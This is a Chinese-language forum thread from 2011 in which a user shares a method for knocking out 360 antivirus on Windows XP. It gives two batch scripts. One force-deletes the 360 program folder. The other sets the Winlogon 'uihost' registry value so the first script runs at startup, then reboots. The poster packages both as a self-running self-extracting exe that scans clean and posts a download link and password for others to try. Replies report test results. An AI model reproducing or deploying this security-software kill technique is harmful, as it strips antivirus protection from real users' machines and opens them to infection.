★★★利用批处理,绕过360杀毒这个问题不是大问题，病毒能做到开机立即运行不必这麻烦

李白vs苏轼

测试环境xp sp3,杀毒版本2.0.0.1330(注意没装卫士,卫士会拦截)，刚试了下1331j一样挂了。。
网络处于联网状态
这个方法是我研究注册表无聊过金山，微点（楼下反应过瑞星了，具体懒得试）成功后,试试360本来以为肯定失败,结果卫士拦截,杀毒没拦截,想不通,,,....

这个问题老是有几率的重现，想不明白,初步分析可能与初始化时网络情况有关
原理:利用xp的uihost（只在xp下有用）在c盘下建一个bat文件1.bat

1. rmdir /s/q "C:\Program Files\360"

复制代码

再建一个bat文件2.bat(名字随便吧)位置随便

1. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v uihost /t reg_sz /d "c:\1.bat" /f
   
2. shutdown -r -t 0

复制代码

运行2.bat,等重启后360文件夹下就剩几个文件而已了,杀毒删除了

根据这个,我把这两个批处理压成自解压,并自运行,扫描没报毒,
有新版的也试试,毕竟这个正式版有点老了
怕云起作用所以录了视频，地址为： http://u.115.com/file/f67e30746a

我把exe文件也传上来，你们试试：
（云应该响应了，一开始报安全，看录像便知道了）


密码：19

第一次安装得重启，因为第一次安装后自保重启前是没开的

亡灵之月

rp不好，没拦截，但是也没成功
vbox 一直联网+ ylmf 6.0 +刚下载的360杀毒正式版

安装好后，打开设置，发现自保已经开启，记得以前要求重启的

重启，双击2.bat ，重启

弹cmd窗口，刷拒绝访问，刷了好几遍，终于到了用户名登录的界面，进去后，360杀毒一切正常

Tron

这个问题好像早就说过了？主防会拦截的，注意开杀毒主防

李白vs苏轼

回复 3楼 Tron 的帖子

有开拦截的而且不是手动运行的,我让自解压去运行,,,,,,而且,卫士直接拦截reg行为
可是杀毒同样调用卫士的 为什么不拦 我想不通,郁闷

Tron

李白vs苏轼 发表于 2011-4-7 21:51
回复 3楼 Tron 的帖子

不是手动运行的,我让自解压去运行,,,,,,而且,卫士直接拦截reg行为

我记错了，看3楼重新编辑了

小蚂蚁的梦想

杀毒的主防难道不拦截么

李白vs苏轼

回复 3楼 Tron 的帖子

有的 待会看录像,115总是上传失败，谁借我个网盘

nazisoft

卫士的主防才是重点，360杀毒是用来扫描的

z13667152750

刚把虚拟机全删除了,固定硬盘设得太小,装个.net2.0,磁盘空间不足
搞了半天,另建磁盘,换虚拟内存位置还是空间不足
受不了,刚在重装虚拟机

李白vs苏轼

回复 3楼 Tron 的帖子

录像好了